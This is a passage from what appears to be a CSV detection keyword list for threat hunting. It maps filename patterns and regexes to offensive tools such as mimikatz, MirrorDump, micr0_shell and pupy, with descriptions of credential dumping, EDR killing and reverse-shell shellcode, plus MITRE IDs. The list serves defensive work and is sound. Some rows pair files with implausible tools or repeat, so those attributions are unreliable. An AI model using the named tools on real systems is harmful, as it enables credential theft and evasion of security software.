Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","4","345","63","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" 
"*/mhydeath/main.cpp*",".{0,1000}\/mhydeath\/main\.cpp.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","4","345","63","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*/michaelweber/Macrome*",".{0,1000}\/michaelweber\/Macrome.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*/micr0%20shell.py*",".{0,1000}\/micr0\%20shell\.py.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","2","126","18","2024-02-19T02:15:36Z","2023-08-13T02:46:51Z" "*/micr0_shell.git*",".{0,1000}\/micr0_shell\.git.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","2","126","18","2024-02-19T02:15:36Z","2023-08-13T02:46:51Z" "*/MicroBurst.git*",".{0,1000}\/MicroBurst\.git.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation 
tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*/mikrotik-routeros-brute.nse*",".{0,1000}\/mikrotik\-routeros\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mimi32.exe*",".{0,1000}\/mimi32\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimi64.exe*",".{0,1000}\/mimi64\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimicom.idl*",".{0,1000}\/mimicom\.idl.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimidogz.git*",".{0,1000}\/mimidogz\.git.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" "*/mimidrv.sys*",".{0,1000}\/mimidrv\.sys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimidrv.zip*",".{0,1000}\/mimidrv\.zip.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimikatz.bin*",".{0,1000}\/mimikatz\.bin.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*/mimikatz.enc*",".{0,1000}\/mimikatz\.enc.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the 
hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*/mimikatz.py*",".{0,1000}\/mimikatz\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*/mimikatz.sln*",".{0,1000}\/mimikatz\.sln.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimikatz_bypass/mimikatz.py*",".{0,1000}\/mimikatz_bypass\/mimikatz\.py.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimikatz_bypass/mimikatz2.py*",".{0,1000}\/mimikatz_bypass\/mimikatz2\.py.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimikatz_bypassAV/main.exe*",".{0,1000}\/mimikatz_bypassAV\/main\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimikatz_bypassAV/mimikatz_load.exe*",".{0,1000}\/mimikatz_bypassAV\/mimikatz_load\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimikatz_load.exe*",".{0,1000}\/mimikatz_load\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimilib.def*",".{0,1000}\/mimilib\.def.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimilib.dll*",".{0,1000}\/mimilib\.dll.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","1","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*/mimilove.c*",".{0,1000}\/mimilove\.c.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimilove.h*",".{0,1000}\/mimilove\.h.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimilove.rc*",".{0,1000}\/mimilove\.rc.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimipenguin.*",".{0,1000}\/mimipenguin\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/mimipenguin.c*",".{0,1000}\/mimipenguin\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*/mimipenguin.md*",".{0,1000}\/mimipenguin\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/mimipenguin/*",".{0,1000}\/mimipenguin\/.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*/mimipenguin/*",".{0,1000}\/mimipenguin\/.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*/mimipy.py*",".{0,1000}\/mimipy\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/mimipy.py*",".{0,1000}\/mimipy\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/mimishim/*",".{0,1000}\/mimishim\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/minidump.go*",".{0,1000}\/minidump\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/minidump.zip*",".{0,1000}\/minidump\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - 
T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*/minidump-rs.exe*",".{0,1000}\/minidump\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/minimal_elf.h*",".{0,1000}\/minimal_elf\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","223","41","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" "*/mirai_pass.txt*",".{0,1000}\/mirai_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/MirrorDump.exe*",".{0,1000}\/MirrorDump\.exe.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","1","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*/MirrorDump.git*",".{0,1000}\/MirrorDump\.git.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential 
